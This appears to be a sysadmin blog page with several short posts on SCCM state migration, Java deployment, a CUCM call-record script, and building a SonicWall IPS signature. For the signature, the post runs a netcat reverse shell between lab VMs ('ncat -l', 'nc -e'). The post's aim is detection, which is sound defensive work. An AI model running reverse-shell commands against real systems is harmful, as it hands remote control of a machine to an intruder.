SCCM client doesn’t connect to the local SMP during OSD

I recently noticed that one of my computers was connecting to an SMP/DP across a T1 to a remote office to store user state during OSD. After reviewing the logs I saw that it was connecting to the local DP for content, but not for user state storage.

I couldn’t find anything in the logs that explained this behavior, and I checked my boundaries and boundary groups and everything looked good. After failing to resolve this on my own over a few days, I opened a ticket with Microsoft support.

It turns out that while using boundaries to connect a client to the local DP is a feature, connecting to the SMP at the local site is not and the client can connect to any writable SMP, even if its across your slowest WAN connection to a remote office.

You have two options to avoid having the client connect across the WAN for user state storage; check “Enable restore-only mode” in your State Migration Point properties under Administration > Servers and Site System Roles, or check “Capture locally by using links instead of copying files” under the “Capture User Files and Settings” step in your OSD.

Enabling restore-only mode will prevent the SMP from being used to store user state, and user state already stored on the SMP is still available. The problem with this approach is that not only will your other sites not use that SMP to store user state, the local clients won’t use it either so they will be sending user state across the WAN to another SMP. You may have to enable or disable this setting as needed, for example if you are imaging multiple workstations in the same office you could enable this setting on all other SMP’s except the one at the site where computers are being imaged.

Capturing locally by using links instead of copying files would prevent you from having to remember to change the SMP settings frequently as it would be a “set it and forget it” solution which is what I prefer.

Creating custom SonicWall IPS signatures

Creating custom SonicWall IPS signatures

I’m going to show how to use Kali Linux and Windows 7 Pro running in VMware Workstation to create a packet capture for the creation of a SonicWall IPS signature to detect a reverse shell. Before writing this article I talked to SonicWall support and asked them if the IPS signatures already detected netcat reverse shells and was told that they do not. After creating this article, I discovered during testing that they actually do. We can still use this article as a reference to create custom IPS signatures in the future so all is not wasted.

On your Kali vm, open a terminal and enter “ncat -l”. This starts ncat listening for our reverse shell on the default port 31337. You may specify a different port: “ncat -l 4444” for example.

In Kali, start Wireshark and make a note of the IP address of the interface you are using for your capture. Start the Wireshark capture.

In Windows, download netcat from and unzip it to the directory of your choice. Open a cmd prompt and either cd to the directory where netcat is extracted, or enter the path with the following command: “nc -e 31337”

On Kali, once the Windows 7 machine connects to our ncat listener you will see your Windows command prompt with the Windows version number. Stop the Wireshark capture. In wireshark, enter a filter to find the right packet: ip.src== and apply it.

Scroll down through the filtered frames until you see:

Click File > Export selected packet, and check “Selected packet only” and save it to your desktop.

I installed the Okteta hex editor in Kali; “apt-get install okteta”. There is a command line hex editor already installed in Kali, however I didn’t want to take the time to learn a cli hex editor since I had a deadline to get this done. I’ll take the time to learn hexedit later.

Open Okteta and open your packet capture that contains the one frame we’re interested in that you previously saved. Highlight the part you see highlighted below since we don’t want to include the directory path in our signature since that may vary. If you use anything beyond “Version 6.1.” then you will need to edit the capture in your hex editor and export a copy for EVERY version of Windows that you need to protect.

Click File > Export > Values, delete out the space in the Separation field to remove the spaces in the Preview field, and click the Export to File button.

To add the new signature, you need to add a new “Match Object”. In the SonicWall web interface, go to Firewall > Match Objects, and at the bottom click “Add new match object”. Enter your object name, I used “Windows Reverse Shell”, Match Object Type should be “Custom Object”, Match Type should be “Exact Match”, Input Representation should be “Hexadecimal”, now paste your hex code you extracted from the hex editor earlier and then click “Add” and then “Ok”.

Create a new app rule:

Python script to search Cisco CUCM Call Detail Records

If you manage Cisco CUCM and get requests for Call Detail Records, you know how frustrating it can be to have to:
  1. import the csv file to Excel
  2. delete out all but 4 of over 60 columns
  3. search thousands of rows of data to narrow down to the one extension
  4. convert epoch time to something a human understands
The first time I had to fulfill a request for call records, it took me most of the day to figure it out. Before I wrote this script it took me an average of a couple hours. That’s two hours too long. With this script and Python installed, you can have a csv file to import into Excel in seconds.

Deploying Java 8 update 25 with SCCM

Product: Java 8 Update 25 — Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action installexe, location: C:WINDOWSInstallerMSI789B.tmp, command: /s INSTALLDIR=”C:Program Files (x86)Javajre1.8.0_25\” EULA=0 REPAIRMODE=0

Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor.

Fix: Put this in your Installation program: msiexec /i jre1.8.0_25.msi JU=0 JAVAUPDATE=0 AUTOUPDATECHECK=0 RebootYesNo=No WEB_JAVA=1 /q